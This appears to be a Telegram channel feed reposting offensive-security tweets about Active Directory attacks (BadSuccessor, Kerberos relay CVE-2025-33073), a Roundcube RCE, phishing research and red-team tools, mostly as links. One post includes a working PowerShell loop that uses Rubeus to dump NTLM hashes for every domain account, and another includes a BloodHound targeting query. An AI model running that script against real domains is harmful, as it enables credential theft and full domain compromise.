😈 [ Yuval Gordon @YuG0rd ]
🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷♂️
Read Here -
🔗 https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory
🐥 [ tweet ]
🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷♂️
Read Here -
🔗 https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory
🐥 [ tweet ]
🔥9
Offensive Xwitter
😈 [ Yuval Gordon @YuG0rd ] 🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it…
😈 [ Bad Sector Labs @badsectorlabs ]
If this query hits, you're in.
🐥 [ tweet ][ quote ]
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectsid ENDS WITH '-516' WITH COLLECT(c1.name) AS dcs MATCH (c2:Computer) WHERE c2.enabled = true AND (c2.operatingsystem contains '2025') AND (c2.name IN dcs) RETURN c2.nameIf this query hits, you're in.
🐥 [ tweet ][ quote ]
👍5
😈 [ mpgn @mpgn_x64 ]
Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥
🔗 https://github.com/Pennyw0rth/NetExec/pull/702
🐥 [ tweet ][ quote ]
Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥
🔗 https://github.com/Pennyw0rth/NetExec/pull/702
🐥 [ tweet ][ quote ]
🔥11🥱3👍1
😈 [ David Kennedy @Cyb3rC3lt ]
Python version of BadSuccessor by Cybrly.
🔗 https://github.com/cybrly/badsuccessor
🐥 [ tweet ]
Python version of BadSuccessor by Cybrly.
🔗 https://github.com/cybrly/badsuccessor
🐥 [ tweet ]
🔥6👍3🥱2
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ Yuval Gordon @YuG0rd ]
Many missed this on #BadSuccessor: it’s also a credential dumper.
I wrote a simple PowerShell noscript that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal-krbtgt, users, machines. no DCSync required, no code execution on DC.
🐥 [ tweet ]
upd. автор делает что-то типа такого, если что, со своей версией рубеуса:
Many missed this on #BadSuccessor: it’s also a credential dumper.
I wrote a simple PowerShell noscript that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal-krbtgt, users, machines. no DCSync required, no code execution on DC.
🐥 [ tweet ]
какой же разъеб 😂🤣upd. автор делает что-то типа такого, если что, со своей версией рубеуса:
$domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
+ @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
$res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
$rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
"$($_.sAMAccountName):$rc4"
}
😁13🔥9🥱2
😈 [ Matt Ehrnschwender @M_alphaaa ]
I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.
🔗 https://github.com/MEhrn00/boflink
Supporting blog post about it.
🔗 https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/
🐥 [ tweet ]
I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.
🔗 https://github.com/MEhrn00/boflink
Supporting blog post about it.
🔗 https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/
🐥 [ tweet ]
🍌7😁1
Forwarded from PT SWARM
This media is not supported in your browser
VIEW IN TELEGRAM
⚠️ We've reproduced CVE-2025-49113 in Roundcube.
This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.
If you're running Roundcube — update immediately!
This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.
If you're running Roundcube — update immediately!
🔥25🥱1🍌1
😈 [ Aditya Telange @adityatelange ]
evil-winrm-py v1 released🌟
🔗 https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0
🐥 [ tweet ]
evil-winrm-py v1 released🌟
🔗 https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0
🐥 [ tweet ]
👍6🔥6
😈 [ Fabian @testert01 ]
Unconstrained Delegation on a gMSA and Webclient / NTLMv1 active on servers that can retrieve the credentials of a gMSA with unconstrained delegation can lead to a complete domain compromise from domain users.
@micahvandeusen, @_dirkjan, nice tools :)
🔗 https://nothingspecialforu.github.io/UCgMSAExploitation/
🐥 [ tweet ]
Unconstrained Delegation on a gMSA and Webclient / NTLMv1 active on servers that can retrieve the credentials of a gMSA with unconstrained delegation can lead to a complete domain compromise from domain users.
@micahvandeusen, @_dirkjan, nice tools :)
🔗 https://nothingspecialforu.github.io/UCgMSAExploitation/
🐥 [ tweet ]
👍6
😈 [ mr.d0x @mrd0x ]
Finally had some time to publish these blogs. Enjoy!
Spying On Screen Activity Using Chromium Browsers
🔗 https://mrd0x.com/spying-with-chromium-browsers-screensharing/
Camera and Microphone Spying Using Chromium Browsers
🔗 https://mrd0x.com/spying-with-chromium-browsers-camera/
🐥 [ tweet ]
Finally had some time to publish these blogs. Enjoy!
Spying On Screen Activity Using Chromium Browsers
🔗 https://mrd0x.com/spying-with-chromium-browsers-screensharing/
Camera and Microphone Spying Using Chromium Browsers
🔗 https://mrd0x.com/spying-with-chromium-browsers-camera/
🐥 [ tweet ]
👍7🥱4
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ James Woolley @Xtrato ]
I left a server online with VNC wide open to see how it would be interacted with. This is one of the more interesting interactions 👆
🐥 [ tweet ]
I left a server online with VNC wide open to see how it would be interacted with. This is one of the more interesting interactions 👆
🐥 [ tweet ]
🥱20🍌7👍5😁3🤯1
😈 [ RedTeam Pentesting @RedTeamPT ]
🚨 Our new blog post about Windows CVE-2025-33073 which we discovered is live.
🪞 The Reflective Kerberos Relay Attack - Remote privilege escalation from low-priv user to SYSTEM with RCE by applying a long forgotten NTLM relay technique to Kerberos:
🔗 https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/
👀 We have also released a paper which really goes into the nitty-gritty for those who are interested:
🔗 https://www.redteam-pentesting.de/publications/2025-06-11-Reflective-Kerberos-Relay-Attack_RedTeam-Pentesting.pdf
🐥 [ tweet ]
🚨 Our new blog post about Windows CVE-2025-33073 which we discovered is live.
🪞 The Reflective Kerberos Relay Attack - Remote privilege escalation from low-priv user to SYSTEM with RCE by applying a long forgotten NTLM relay technique to Kerberos:
🔗 https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/
👀 We have also released a paper which really goes into the nitty-gritty for those who are interested:
🔗 https://www.redteam-pentesting.de/publications/2025-06-11-Reflective-Kerberos-Relay-Attack_RedTeam-Pentesting.pdf
🐥 [ tweet ]
🔥11
😈 [ Synacktiv @Synacktiv ]
Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Checkout the details in the blogpost by @yaumn_ and @wil_fri3d.
🔗 https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
🐥 [ tweet ]
Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Checkout the details in the blogpost by @yaumn_ and @wil_fri3d.
🔗 https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
🐥 [ tweet ]
🥱8👍4
😈 [ Praetorian @praetorianlabs ]
🚨 New attack disclosed: GitHub Device Code Phishing
John, Matt, and Mason reveal how they've been using this technique to compromise F500 orgs with high success rates.
📖 Blog covers methodology, red team case studies & detection strategies
🔗 https://www.praetorian.com/blog/introducing-github-device-code-phishing/
🐥 [ tweet ]
🚨 New attack disclosed: GitHub Device Code Phishing
John, Matt, and Mason reveal how they've been using this technique to compromise F500 orgs with high success rates.
📖 Blog covers methodology, red team case studies & detection strategies
🔗 https://www.praetorian.com/blog/introducing-github-device-code-phishing/
🐥 [ tweet ]
🔥7
😈 [ Jonathan Beierle @hullabrian ]
I just released COMmander - a .NET tool designed to provide an easy to use interface for COM and RPC based attacks. It taps into the Microsoft-Windows-RPC ETW provider and allows you to provide a customizable rule set for detections.
🔗 https://github.com/HullaBrian/COMmander
🐥 [ tweet ]
I just released COMmander - a .NET tool designed to provide an easy to use interface for COM and RPC based attacks. It taps into the Microsoft-Windows-RPC ETW provider and allows you to provide a customizable rule set for detections.
🔗 https://github.com/HullaBrian/COMmander
🐥 [ tweet ]
🔥4👍1
Forwarded from Positive Technologies
Как ребята готовились и проводили атаки при помощи социальной инженерии, что из этого вышло и чем помогло клиентам, подробно рассказал в своей статье для Positive Research Константин Полишин, руководитель группы Red Team SE отдела тестирования на проникновение Positive Technologies.
Вы удивитесь, как много можно узнать о компании, применяя лишь методы пассивной разведки. Например, используемый стек технологий легко находится в вакансиях для айтишников и резюме сотрудников. А корпоративные адреса — в публичных утечках данных и логах инфостилеров. А уж если искать информацию активно — можно собрать из разных источников целые досье на предполагаемых жертв.
🎣 Дальше остается тщательно подобрать фокус-группу, разработать фишинговый сценарий и раз за разом забрасывать удочку, пока не сработает. Для этого редтимеры (как и предполагаемые злоумышленники) тщательно изучают содержимое почтовых ящиков, ключевые слова в письмах, корпоративный стиль общения, внутреннюю жизнь и процессы в компании.
#PositiveResearch
@Positive_Technologies
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🍌4
😈 [ Elastic Security Labs @elasticseclabs ]
Dive deep into malware detection with the latest article by John Uhlmann: "Call Stacks: No More Free Passes for Malware." Discover how call stacks provide vital insights into malware behavior. Read more:
🔗 https://www.elastic.co/security-labs/call-stacks-no-more-free-passes-for-malware/
🐥 [ tweet ]
Dive deep into malware detection with the latest article by John Uhlmann: "Call Stacks: No More Free Passes for Malware." Discover how call stacks provide vital insights into malware behavior. Read more:
🔗 https://www.elastic.co/security-labs/call-stacks-no-more-free-passes-for-malware/
🐥 [ tweet ]
👍3🔥2
😈 [ SpecterOps @SpecterOps ]
Introducing the BloodHound Query Library!
📚 https://queries.specterops.io/
@martinsohndk & @joeydreijer explore the new collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem.
🔗 https://specterops.io/blog/2025/06/17/introducing-the-bloodhound-query-library/
🐥 [ tweet ]
Introducing the BloodHound Query Library!
📚 https://queries.specterops.io/
@martinsohndk & @joeydreijer explore the new collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem.
🔗 https://specterops.io/blog/2025/06/17/introducing-the-bloodhound-query-library/
🐥 [ tweet ]
🔥11
😈 [ Alex Neff @al3x_n3ff ]
Did you know that you can kerberoast without any valid credentials? All you need is an account that is ASREProastable.
This allows you to request service tickets for any account with a set SPN🔥
NetExec now has a native implementation of this technique, thanks to Azox
🐥 [ tweet ]
Did you know that you can kerberoast without any valid credentials? All you need is an account that is ASREProastable.
This allows you to request service tickets for any account with a set SPN🔥
NetExec now has a native implementation of this technique, thanks to Azox
🐥 [ tweet ]
🔥17🥱6👍2